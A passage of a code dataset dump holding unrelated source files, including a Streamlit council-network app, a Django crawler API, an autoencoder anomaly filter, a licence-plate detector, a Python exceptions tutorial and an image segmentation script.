red_price\n speech = '{}{}個でお会計{}円になります'.format(red_apple,num_1,checkout_all)\n return tell(speech)\n else:\n checkout_all = checkout(int(num_1) ,int(num_2))\n speech = '{}{}個と{}{}個でお会計{}円になります'.format(red_apple,num_1,green_apple,num_2,checkout_all)\n return tell(speech)\n\nif __name__ == '__main__':\n app.run(host=\"127.0.0.1\", port=5000)\n","sub_path":"Chapter3/proto_g_calc.py","file_name":"proto_g_calc.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154184797","text":"import streamlit as st\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import 
figure, text\nimport pandas as pd\nimport requests\n\nurl = \"https://docs.google.com/spreadsheets/d/1uo_oC3HfWpbV1FDQjrVdNyxgsEzDFs7qV3IUPa9N4kQ/edit#gid=0\"\nsheet_url = \"https://docs.google.com/spreadsheets/d/1uo_oC3HfWpbV1FDQjrVdNyxgsEzDFs7qV3IUPa9N4kQ/edit#gid=0\"\nurl_1 = sheet_url.replace( '/edit#gid=', '/export?format=csv&gid=')\n\nst.title(\"Christie Pavey's Council App\")\n\ndf = pd.read_csv(url_1)\n\n\ncouncils = df[\"council\"].values.tolist()\ncouncils = list(set(councils))\nall_data = {}\nfor item in councils:\n all_data[item] = []\n\nfor index, row in df.iterrows():\n all_data[row['council']].append(row['person'])\npeople = df[\"person\"].values.tolist()\npeople = list(set(people))\nperson_data = {}\nfor item in people:\n person_data[item] = []\nfor index, row in df.iterrows():\n person_data[row['person']].append(row['council'])\n\nnew_people = [\"councils\"]+people\neverything = {}\neverything2 = []\nfor council in councils:\n temp = [council]\n temp2 = {\"councils\": council}\n for person in people:\n if person in all_data[council]:\n temp.append(1)\n temp2[person] = 1\n else:\n temp.append(0)\n temp2[person] = 0\n everything[council] = temp\n everything2.append(temp2)\nnew_df = pd.DataFrame(columns=new_people)\nnew_df = new_df.append(everything2)\nfrom collections import Counter\nimport operator\ndef find_groups(min_occurences):\n total = 0\n groupings = []\n for person in people:\n council_matches = []\n pairs = []\n counter = 0\n for council in all_data:\n for person2 in people:\n if person2 != person:\n if person2 in all_data[council] and person in all_data[council]:\n pairs.append((person, person2))\n council_matches.append(council)\n pairs = Counter(pairs)\n x=0\n for pair in pairs:\n x=x+1\n if pairs[pair] > min_occurences-1:\n counter += 1\n groupings.append(pair)\n total += counter\n final = []\n for group in groupings:\n sorted_list = tuple(sorted(group))\n final.append(sorted_list)\n final = list(set(final))\n\n return (len(final), final)\ndef find_max_overlap(min_occurences):\n total = 0\n groupings = []\n for person in people:\n pairs = []\n counter = 0\n for council in all_data:\n council_matches = []\n for person2 in people:\n if person2 != person:\n for person3 in people:\n if person3 !=person and person3 != person2:\n if person2 in all_data[council] and person in all_data[council] and person3 in all_data[council]:\n pairs.append((person, person2, person3))\n council_matches.append(council)\n pairs = Counter(pairs)\n x=0\n for pair in pairs:\n x=x+1\n if pairs[pair] > min_occurences-1:\n counter += 1\n groupings.append(pair)\n total += counter\n final = []\n for group in groupings:\n sorted_list = tuple(sorted(group))\n final.append(sorted_list)\n final = list(set(final))\n return (len(final), final)\noption = st.selectbox(\n 'Search for Group of:',\n ('Pairs', 'Triplets'))\nsearch = int(st.text_input(\"Enter Number of Councils Pairs appear at Councils:\"))\nif option == \"Pairs\":\n quantity, hits = find_groups(search)\n grouping = \"pairs\"\nelse:\n quantity, hits = find_max_overlap(search)\n grouping = \"triplets\"\n\nst.text(f\"There are {quantity} examples of {grouping} that appear at councils {search} times together. 
They are:\")\nfor hit in hits:\n if grouping == \"pairs\":\n st.text(f\"{hit[0]} and {hit[1]}\")\n else:\n st.text(f\"{hit[0]}, {hit[1]} and {hit[2]}\")\nG = nx.Graph()\ndf1 = df[['council', 'person']]\nG = nx.from_pandas_edgelist(df1, 'council', 'person')\ncolor_map = []\n\nfor node in G:\n if node in df[\"council\"].values:\n color_map.append(\"coral\")\n else:\n color_map.append(\"darkseagreen\")\nd = nx.degree(G)\nd = [(d[node]+1) * 40 for node in G.nodes()]\nimport math\npos = nx.spring_layout(G, k=10/math.sqrt(G.order()))\nfrom matplotlib.pyplot import figure\nfig = figure(figsize=(30, 30))\ndata = nx.draw_networkx(G, node_color=color_map, with_labels=True, node_size=d, font_size=12)\nplt.savefig(\"temp.png\")\nst.image(\"temp.png\")\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"90355176","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models\n\nclass Sale_field(models.Model):\n\n _inherit='account.invoice'\n\n aref = fields.Reference([('sale_order', 'String')])\n x_OrdenCompra = fields.Char(string='Orden de Compra', compute=\"_orden_agregar\")\n\n @api.multi\n @api.depends('origin')\n def _orden_agregar(self):\n for record in self:\n \trecord['x_OrdenCompra'] = self.env['sale.order'].search([('name', '=', record.origin)]).x_ordendecompra\n","sub_path":"sale_field/model/invoice_field.py","file_name":"invoice_field.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25547647","text":"from flask import Blueprint, request\nfrom apikit import request_data, jsonify, Pager\nfrom sqlalchemy import or_\n\nfrom aleph import authz\nfrom aleph.model import db, CrawlerState\nfrom aleph.crawlers import get_exposed_crawlers, execute_crawler\n\nblueprint = Blueprint('crawlers_api', __name__)\n\n\n@blueprint.route('/api/1/crawlers', methods=['GET'])\ndef index():\n authz.require(authz.is_admin())\n crawlers = list(get_exposed_crawlers())\n return jsonify(Pager(crawlers, limit=20))\n\n\n@blueprint.route('/api/1/crawlers', methods=['POST', 'PUT'])\ndef queue():\n authz.require(authz.is_admin())\n data = request_data()\n crawler_id = data.get('crawler_id')\n for cls in get_exposed_crawlers():\n if crawler_id == cls.get_id():\n incremental = bool(data.get('incremental', False))\n execute_crawler.delay(crawler_id, incremental=incremental)\n return jsonify({'status': 'queued'})\n return jsonify({'status': 'error', 'message': 'No such crawler'},\n status=400)\n\n\n@blueprint.route('/api/1/collections//crawlerstates',\n methods=['GET'])\ndef collection_crawlerstates(id):\n authz.require(authz.collection_write(id))\n q = db.session.query(CrawlerState)\n q = q.filter(CrawlerState.collection_id == id)\n q = q.filter(or_(\n CrawlerState.error_type != 'init',\n CrawlerState.error_type == None # noqa\n ))\n\n status = request.args.get('status')\n if status:\n q = q.filter(CrawlerState.status == status)\n\n crawler_id = request.args.get('crawler_id')\n if crawler_id:\n q = q.filter(CrawlerState.crawler_id == crawler_id)\n\n crawler_run = request.args.get('crawler_run')\n if crawler_run:\n q = q.filter(CrawlerState.crawler_run == crawler_run)\n\n q = q.order_by(CrawlerState.created_at.desc())\n return jsonify(Pager(q, 
id=id))\n","sub_path":"aleph/views/crawlers_api.py","file_name":"crawlers_api.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"170958732","text":"import keras\nfrom utils import data_loader, data_preprocess\nimport numpy as np\n\nauto_encoder_model_filename = \"fixed_models/autoencoder.h5\"\n\n\nclass AutoEncoder:\n def __init__(self):\n self.auto_encoder = keras.models.load_model(auto_encoder_model_filename)\n self.auto_encoder.compile(optimizer='adam', loss='mean_squared_error')\n self.threshold = 0.09179428238229165\n\n def reset_threshold(self, retrained_data_filename):\n retrained_x, retrained_y = data_loader(retrained_data_filename)\n retrained_x = data_preprocess(retrained_x)\n reconstructions = self.auto_encoder.predict(retrained_x)\n train_loss = keras.losses.mae(reconstructions, retrained_x)\n self.threshold = np.mean(train_loss) + np.std(train_loss) + 0.03\n\n def encoder_predict(self, input_x):\n '''\n Generate mask for detecting the abnomal input. Once the constrcture loss over the threhold,\n we treat it as abnormal input\n\n Args:\n autoencoder(Model): autoencoder model\n input_x (array size with [None,55,47,3]): Input data\n threshold (float): used to detect abnomal input\n\n Retrun:\n res: A mask like [0,1,0,1....] in numpy.array type. 0 is abnormal point, and 1 is validated point\n\n '''\n reconstruction = self.auto_encoder.predict(input_x)\n detect_loss = keras.losses.mae(reconstruction, input_x)\n res = np.fromiter(map(lambda x: 1 if (np.mean(x) + np.std(x)) <= self.threshold else 0, detect_loss), dtype=int)\n return res\n\n\nclass AutoEncoderRepairedModel:\n\n def __init__(self, autoencoder, repaired_model):\n self.AE = autoencoder\n self.repaired_model = repaired_model\n\n def predict(self, x):\n mask = self.AE.encoder_predict(x)\n y_hat = np.argmax(self.repaired_model.predict(x), axis=1)\n y_hat[mask == 0] = 1283\n return y_hat\n\n\n'''\ndef final_predict(autoencoder, repaired_model, x):\n mask = autoencoder.encoder_predict(x)\n y_hat = np.argmax(repaired_model.predict(x), axis=1)\n y_hat[mask == 0] = 1283\n return y_hat\n\n\nif __name__ == '__main__':\n\n AE = AutoEncoder()\n repaired_model = keras.models.load_model(\"fixed_models/pruning.h5\")\n retrained_x, retrained_y = data_loader(retrained_data_filename)\n retrained_x = data_preprocess(retrained_x)\n retrained_y_hat = final_predict(AE,repaired_model,retrained_x)\n print(np.mean(np.equal(retrained_y_hat, retrained_y)) * 100)\n\n'''\n","sub_path":"auto_encoder_utils.py","file_name":"auto_encoder_utils.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"558379859","text":"# Copyright (c) 2016 Matthew Earl\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE 
WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN\n# NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\n# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE\n# USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n\n\"\"\"\nRoutines to detect number plates.\n\nUse `detect` to detect all bounding boxes, and use `post_process` on the output\nof `detect` to filter using non-maximum suppression.\n\npython3 ../detect_oneImage.py orig1-plateOnly-glb-172.jpg /home/mka/PycharmProjects/deep-anpr-x64-y32-finplate/weights3.npz\n\npython3 ../detect_oneImage.py orig1-plateOnly-glb-172.jpg /home/mka/PycharmProjects/deep-anpr-x64-y32/weights.npz\n\n\n\n\"\"\"\n\nimport collections\nimport itertools\nimport math\nimport sys\n\nimport cv2\nimport numpy as np\nimport tensorflow as tf\n\nimport Image2Characters.model\n\nfrom scipy.optimize import minimize, fmin_l_bfgs_b, fmin_powell, \\\n basinhopping, differential_evolution, brute\n\nfrom matplotlib import pyplot as plt\n\n__all__ = (\n 'DIGITS',\n 'LETTERS',\n 'CHARS',\n 'sigmoid',\n 'softmax',\n )\n\nimport numpy\n\n\nDIGITS = \"0123456789\"\nLETTERS = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\nCHARS = LETTERS + DIGITS + '-'\n\ndef softmax(a):\n exps = numpy.exp(a.astype(numpy.float64))\n return exps / numpy.sum(exps, axis=-1)[:, numpy.newaxis]\n\ndef sigmoid(a):\n return 1. / (1. + numpy.exp(-a))\n \n\nclass RandomDisplacementBounds(object):\n \"\"\"random displacement with bounds\"\"\"\n def __init__(self, xmin, xmax, stepsize=0.05):\n self.xmin = xmin\n self.xmax = xmax\n self.stepsize = stepsize\n\n def __call__(self, x):\n \"\"\"take a random step but ensure the new position is within the bounds\"\"\"\n while True:\n # this could be done in a much more clever way, but it will work for example purposes\n xnew = x + np.random.uniform(-self.stepsize, self.stepsize, np.shape(x))\n if np.all(xnew < self.xmax) and np.all(xnew > self.xmin):\n break\n return xnew\n\nclass Detect():\n \"\"\" maximaze the probability of a plate as seen by the trained neural network\n we search the best window in the image\n (upperleft x and y, and width and height in the image)\n give the letters of the plate for this subimage \"\"\"\n\n\n def __init__(self, image=None, param_vals=None):\n self.image = image # image containing the number plate\n self.param_vals = param_vals # neural network optimal values from train.py\n self.uly = 10 # upper left y of the portion\n self.ulx = 10 # upper left x of the portion\n self.lry = image.shape[0]-10 # width of the portion\n self.lrx = image.shape[1]-10 # heigth of the portion\n self.prob = None # final probability\n self.best_letters = None # final characters of the plage\n self.scale=1e-8 # trick to get scipy minimize work for integer function\n self.best = 1.0\n self.best_rectangle = None\n\n def setNpImage(self,image):\n self.image=image\n \n def get_best(self):\n return self.best, self.best_letters\n\n def get_best_rectangle(self):\n return self.best_rectangle\n\n def make_scaled_im(self, clone):\n return cv2.resize(clone, (model.WINDOW_SHAPE[1], model.WINDOW_SHAPE[0]))\n\n\n def maximise_prob(self):\n \"\"\" by scipy cg, find the portion of the image that gives max probability of a plate\"\"\"\n x0 = np.asarray([0.1,0.1,0.9,0.9])\n #direc=np.asarray([100,100,-100,-100])\n bnds = ((0.0, 1.0), (0.0, 1.0),\n (0.0, 1.0), (0.0, 1.0))\n\n rranges = (slice(0, self.image.shape[0], 10),\n slice(0, 
self.image.shape[1], 10),\n slice(0, self.image.shape[0], 10),\n slice(0, self.image.shape[1], 10))\n print(bnds)\n print(\"x0\",x0)\n res = brute(self.detect, rranges)\n # res = differential_evolution(func=self.detect, bounds=bnds, strategy='best1exp', popsize=5, mutation=1.99)\n #res = minimize(self.detect, x0, method='SLSQP', bounds=bnds, options = {'eps': 0.5})\n #BASIN define the new step taking routine and pass it to basinhopping\n #BASIN take_step = RandomDisplacementBounds(0, 1)\n #BASIN minimizer_kwargs = dict(method=\"SLSQP\", bounds=bnds, options={'maxiter':1})\n #BASIN res = basinhopping(self.detect, x0, T=0.001, minimizer_kwargs=minimizer_kwargs,take_step=take_step)\n #res = minimize(self.detect, x0, method='SLSQP')\n #xx,yy,zz = fmin_powell(self.detect, x0, direc=direc)\n #xval,fval,other = fmin_l_bfgs_b(func=self.detect, x0=x0, approx_grad=True, bounds=bnds)\n #xval,fval,other = fmin_l_bfgs_b(func=g, x0=x0, approx_grad=True)\n\n print(\"result1\", res)\n\n def letter_probs_to_code(self, letter_probs):\n return \"\".join(CHARS[i] for i in np.argmax(letter_probs, axis=1))\n\n def g2(self, x):\n res = x[0] + x[1] - x[2] - x[3]\n return res\n\n def get_prob_and_letters(self, image):\n \"\"\" for a single image, get a probability that a plate of roughly right size is there,\n get also characters of the plate \"\"\"\n\n xx, yy, params = model.get_detect_model()\n\n #plt.imshow(scaled_im)\n #plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis\n #plt.show()\n\n present_prob=0.0\n xx, yy, params = model.get_detect_model()\n # Execute the model at each scale.\n with tf.Session(config=tf.ConfigProto()) as sess:\n y_vals = []\n feed_dict = {xx: np.stack([image])}\n feed_dict.update(dict(zip(params, self.param_vals)))\n y_vals.append(sess.run(yy, feed_dict=feed_dict))\n\n # Interpret the results in terms of bounding boxes in the input image.\n # Do this by identifying windows (at all scales)\n # where the model predicts a\n # number plate has a greater than 50% probability of appearing.\n #\n # To obtain pixel coordinates,\n # the window coordinates are scaled according\n # to the stride size, and pixel coordinates.\n i=0; y_val = y_vals[0]\n for window_coords in np.argwhere(y_val[0, :, :, 0] > -math.log(1./0.001 - 1)):\n letter_probs = (y_val[0,\n window_coords[0],\n window_coords[1], 1:].reshape(\n 7, len(CHARS)))\n letter_probs = softmax(letter_probs)\n\n img_scale = float(1)\n\n present_prob = sigmoid(\n y_val[0, window_coords[0], window_coords[1], 0])\n\n print(present_prob, self.letter_probs_to_code(letter_probs))\n if present_prob > 0.0:\n letters = self.letter_probs_to_code(letter_probs)\n else:\n letters = None\n\n return present_prob, letters\n\n def get_all_prob_letters(self, nstepBigger=16, nstepSmaller=6, stepPix=4):\n \"\"\" scale image and get corresponding probability of existence a proper plate and get also plate characters\"\"\"\n images = []\n probs = []\n letters = []\n # start from small\n width = self.image.shape[1]-nstepSmaller * stepPix\n height = self.image.shape[0]-nstepSmaller * stepPix\n ulx = width/2\n uly = height/2\n for istep in range(nstepBigger + nstepSmaller):\n # take slice\n scaled_im = self.image.copy()[uly:(uly+height), ulx:(ulx+width)]\n scaled_im = cv2.resize(scaled_im, (model.WINDOW_SHAPE[1], model.WINDOW_SHAPE[0]))\n present_prob, letters = self.get_prob_and_letters(scaled_im)\n probs.append(present_prob)\n letters.append(letters)\n images.append(image)\n\n plt.plot(probs)\n plt.title(\"Probs\")\n plt.show()\n\n\n def 
detect(self, x):\n \"\"\"\n Detect number plates in an image.\n :param x\n area in image xtopleft, ytopleft, width, height\n\n \"\"\"\n\n xarea = x.copy()\n #xarea[0] = x[0]*self.image.shape[0]\n #xarea[2] = x[2]*self.image.shape[0]\n #xarea[1] = x[1]*self.image.shape[1]\n #xarea[3] = x[3]*self.image.shape[1]\n #xarea = xarea.astype(int)\n\n\n #small_image = self.image.copy()[xarea[1]:(xarea[1]+xarea[3]),\n # xarea[0]:(xarea[0] + xarea[2])]\n # Convert the image to various scales.\n #scaled_im = self.make_scaled_im(small_image.copy())\n scaled_im = self.make_scaled_im(self.image.copy())\n\n # Load the model which detects number plates over a sliding window.\n xx, yy, params = model.get_detect_model()\n\n plt.imshow(scaled_im)\n plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis\n plt.show()\n\n present_prob=0.0\n\n # Execute the model at each scale.\n with tf.Session(config=tf.ConfigProto()) as sess:\n y_vals = []\n feed_dict = {xx: np.stack([scaled_im])}\n feed_dict.update(dict(zip(params, self.param_vals)))\n y_vals.append(sess.run(yy, feed_dict=feed_dict))\n\n # Interpret the results in terms of bounding boxes in the input image.\n # Do this by identifying windows (at all scales)\n # where the model predicts a\n # number plate has a greater than 50% probability of appearing.\n #\n # To obtain pixel coordinates,\n # the window coordinates are scaled according\n # to the stride size, and pixel coordinates.\n i=0; y_val = y_vals[0]\n for window_coords in np.argwhere(y_val[0, :, :, 0] > -math.log(1./0.001 - 1)):\n letter_probs = (y_val[0,\n window_coords[0],\n window_coords[1], 1:].reshape(\n 7, len(CHARS)))\n letter_probs = softmax(letter_probs)\n\n img_scale = float(1)\n\n present_prob = sigmoid(\n y_val[0, window_coords[0], window_coords[1], 0])\n\n print(present_prob, self.letter_probs_to_code(letter_probs))\n if present_prob > 0.0:\n letters = self.letter_probs_to_code(letter_probs)\n else:\n letters = None\n result = 1.0-present_prob\n if result < self.best:\n self.best = 1.0-present_prob\n self.best_letters = letters\n self.best_rectangle = xarea\n print(\"returning\",result)\n return result\n\n\nif __name__ == \"__main__\":\n im_gray = cv2.imread(sys.argv[1])[:, :, 0].astype(numpy.float32) / 255.\n #im = cv2.imread(sys.argv[1])\n #try:\n # im_gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n #except:\n # im_gray = im \n\n f = np.load(sys.argv[2])\n param_vals = [f[n] for n in sorted(f.files, key=lambda s: int(s[4:]))]\n print(im_gray.shape)\n #plt.imshow(im_gray)\n #plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis\n #plt.show()\n app = Detect(image=im_gray, param_vals = param_vals)\n #app.maximise_prob()\n #detect(im_gray[27:120,140:480], param_vals)\n app.detect(im_gray)\n\n\n","sub_path":"detect_oneImage.py","file_name":"detect_oneImage.py","file_ext":"py","file_size_in_byte":12194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"571704356","text":"# When we awesome programmers write our code many things could go wrong,\n# our programs can encounter a lot of different exceptions. 
It is our duty to handle this of course.\n\n# Lets create an example that crashes our application:\n\nnumbers = [1, 2]\n\n# BAD PROGRAMMING:\n\n# print(numbers[3]) # Uncomment to see the world burn :D\n\n# Okay the above code should not slip in to production code, because it would be bad code!\n# But what to do with the unexpected, like user input for example?\n\n# Hopefully our user knows what to do; and which data we need\n\n# \"said no one ever...\"\n\n# For these kind of situations we have the try-except block:\n\ntry:\n age = int(input('Please fill in your age: ')) # Remember the input function always returns a string!\nexcept ValueError:\n print('You did not enter a valid age!')\nelse:\n print('Executed if and only if there was no exception thrown') # Test it when in doubt :D\n\nprint('Executions continues whatever happens') # Because we took care of a possible exception we're sure to arrive here whatever happens\n\n# Here is an overview of the Python exception hierarchy:\n# More info can be found here: https://docs.python.org/3/library/exceptions.html\n\n# TL;DR\n\n\"\"\"\nBaseException0.\n +-- SystemExit\n \n +-- KeyboardInterrupt\n +-- GeneratorExit\n +-- Exception\n +-- StopIteration\n +-- StopAsyncIteration\n +-- ArithmeticError\n | +-- FloatingPointError\n | +-- OverflowError\n | +-- ZeroDivisionError\n +-- AssertionError\n +-- AttributeError\n +-- BufferError\n +-- EOFError\n +-- ImportError\n | +-- ModuleNotFoundError\n +-- LookupError\n | +-- IndexError\n | +-- KeyError\n +-- MemoryError\n +-- NameError\n | +-- UnboundLocalError\n +-- OSError\n | +-- BlockingIOError\n | +-- ChildProcessError\n | +-- ConnectionError\n | | +-- BrokenPipeError\n | | +-- ConnectionAbortedError\n | | +-- ConnectionRefusedError\n | | +-- ConnectionResetError\n | +-- FileExistsError\n | +-- FileNotFoundError\n | +-- InterruptedError\n | +-- IsADirectoryError\n | +-- NotADirectoryError\n | +-- PermissionError\n | +-- ProcessLookupError\n | +-- TimeoutError\n +-- ReferenceError\n +-- RuntimeError\n | +-- NotImplementedError\n | +-- RecursionError\n +-- SyntaxError\n | +-- IndentationError\n | +-- TabError\n +-- SystemError\n +-- TypeError\n +-- ValueError\n | +-- UnicodeError\n | +-- UnicodeDecodeError\n | +-- UnicodeEncodeError\n | +-- UnicodeTranslateError\n +-- Warning\n +-- DeprecationWarning\n +-- PendingDeprecationWarning\n +-- RuntimeWarning\n +-- SyntaxWarning\n +-- UserWarning\n +-- FutureWarning\n +-- ImportWarning\n +-- UnicodeWarning\n +-- BytesWarning\n +-- ResourceWarning\n\"\"\"\n","sub_path":"3-exceptions/1-basics/GeneralExceptions.py","file_name":"GeneralExceptions.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"229855897","text":"__author__ = 'Administrator'\nfrom django.conf.urls import patterns, url\nfrom user import views\n\nurlpatterns = patterns('',\n url(r'^register/$', views.register, name='register'),\n url(r'^login/$', views.login, name='login'),\n url(r'^getUserInfo/$', views.get_user_info, name='getUserInfo'),\n # url(r'register1/$', views.signup, name='hello'),\n # url(r'hello/test/$', views.test, name='test'),\n)\n","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621531846","text":"import numpy as np\n\n# Our image processing tools\nimport skimage.filters\nimport skimage.io\nimport skimage.measure\nimport 
# Here is an overview of the Python exception hierarchy:\n# More info can be found here: https://docs.python.org/3/library/exceptions.html\n\n# TL;DR\n\n\"\"\"\nBaseException\n +-- SystemExit\n +-- KeyboardInterrupt\n +-- GeneratorExit\n +-- Exception\n      +-- StopIteration\n      +-- StopAsyncIteration\n      +-- ArithmeticError\n      |    +-- FloatingPointError\n      |    +-- OverflowError\n      |    +-- ZeroDivisionError\n      +-- AssertionError\n      +-- AttributeError\n      +-- BufferError\n      +-- EOFError\n      +-- ImportError\n      |    +-- ModuleNotFoundError\n      +-- LookupError\n      |    +-- IndexError\n      |    +-- KeyError\n      +-- MemoryError\n      +-- NameError\n      |    +-- UnboundLocalError\n      +-- OSError\n      |    +-- BlockingIOError\n      |    +-- ChildProcessError\n      |    +-- ConnectionError\n      |    |    +-- BrokenPipeError\n      |    |    +-- ConnectionAbortedError\n      |    |    +-- ConnectionRefusedError\n      |    |    +-- ConnectionResetError\n      |    +-- FileExistsError\n      |    +-- FileNotFoundError\n      |    +-- InterruptedError\n      |    +-- IsADirectoryError\n      |    +-- NotADirectoryError\n      |    +-- PermissionError\n      |    +-- ProcessLookupError\n      |    +-- TimeoutError\n      +-- ReferenceError\n      +-- RuntimeError\n      |    +-- NotImplementedError\n      |    +-- RecursionError\n      +-- SyntaxError\n      |    +-- IndentationError\n      |    +-- TabError\n      +-- SystemError\n      +-- TypeError\n      +-- ValueError\n      |    +-- UnicodeError\n      |         +-- UnicodeDecodeError\n      |         +-- UnicodeEncodeError\n      |         +-- UnicodeTranslateError\n      +-- Warning\n           +-- DeprecationWarning\n           +-- PendingDeprecationWarning\n           +-- RuntimeWarning\n           +-- SyntaxWarning\n           +-- UserWarning\n           +-- FutureWarning\n           +-- ImportWarning\n           +-- UnicodeWarning\n           +-- BytesWarning\n           +-- ResourceWarning\n\"\"\"\n","sub_path":"3-exceptions/1-basics/GeneralExceptions.py","file_name":"GeneralExceptions.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"229855897","text":"__author__ = 'Administrator'\nfrom django.conf.urls import patterns, url\nfrom user import views\n\nurlpatterns = patterns('',\n    url(r'^register/$', views.register, name='register'),\n    url(r'^login/$', views.login, name='login'),\n    url(r'^getUserInfo/$', views.get_user_info, name='getUserInfo'),\n    # url(r'register1/$', views.signup, name='hello'),\n    # url(r'hello/test/$', views.test, name='test'),\n)\n","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621531846","text":"import numpy as np\n\n# Our image processing tools\nimport skimage.filters\nimport skimage.io\nimport skimage.measure\nimport skimage.morphology\nimport skimage.segmentation\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Set matplotlib rc params.\nrc = {'lines.linewidth' : 2, 'axes.labelsize' : 18,\n      'axes.titlesize' : 18}\nsns.set(rc=rc)\nsns.set_style('dark')\n\n# Load the images\nphase_im = skimage.io.imread('data/HG105_images/noLac_phase_0004.tif')\nfl_im = skimage.io.imread('data/HG105_images/noLac_FITC_0004.tif')\n\n\nplt.imshow(phase_im, cmap=plt.cm.viridis)\nplt.close()\n\n# Apply a gaussian blur to the image\nim_blur = skimage.filters.gaussian(phase_im, 50.0) # radius = 50\n\n# Show the blurred image\nplt.imshow(im_blur, cmap=plt.cm.viridis)\nplt.close()\n\n# Convert phase image to a float\nphase_float = skimage.img_as_float(phase_im) # rescaling between zero and one\nphase_sub = phase_float - im_blur\n\nplt.figure()\nplt.imshow(phase_float, cmap=plt.cm.viridis)\nplt.title('original')\n\nplt.figure()\nplt.imshow(phase_sub, cmap=plt.cm.viridis)\nplt.title('subtracted')\n\nplt.close()\n\n# Apply Otsu thresholding\nthresh = skimage.filters.threshold_otsu(phase_sub)\nseg = phase_sub < thresh\n\nplt.imshow(seg, cmap=plt.cm.Greys_r)\nplt.close()\n\n# Label each pixel 'island'\nseg_lab, num_cells = skimage.measure.label(seg, return_num=True, background=0)\nplt.imshow(seg_lab, cmap=plt.cm.Spectral_r)\nplt.close()\n\n# Compute the region properties and extract area of each object\nip_dist = 0.063 # µm per pixel\nprops = skimage.measure.regionprops(seg_lab)\n# props[0].area would give the pixel area of the first object\n\n# Get the areas as an array\nareas = np.array([prop.area for prop in props])\ncutoff = 300\n\nim_cells = np.copy(seg_lab) > 0\nfor i, _ in enumerate(areas):\n    if areas[i] < cutoff:\n        # Erase it from our image by setting all pixels = 0\n        im_cells[seg_lab==props[i].label] = 0\n\narea_filt_lab = skimage.measure.label(im_cells)\n\nplt.figure()\nplt.imshow(area_filt_lab, cmap=plt.cm.Spectral_r)\n#plt.imshow(im_cells)\nplt.show()\n","sub_path":"image_processing_case_study.py","file_name":"image_processing_case_study.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"484672202","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n    path('accounts/', include('django.contrib.auth.urls')),\n    path('accounts/', include('accounts.urls')),\n\n    path('admin/', admin.site.urls),\n    path('', include('products.urls', namespace='products')),\n    path('cart/', include('cart.urls', namespace='cart')),\n    path('checkout/', include('checkout.urls', namespace='checkout')),\n    path('contact/', include('contact.urls', namespace='contact')),\n    path('acc/', include('allauth.urls')),\n]\n\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"ecommerce/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"547900417","text":"# -*- coding: utf-8 -*-\n\nfrom django import template\nfrom django.template import Node, NodeList, Template, Context, Variable\nfrom django.template import TemplateSyntaxError\nfrom django.utils.encoding import force_unicode\nfrom django.conf import settings\nimport os, re\n\nregister = 
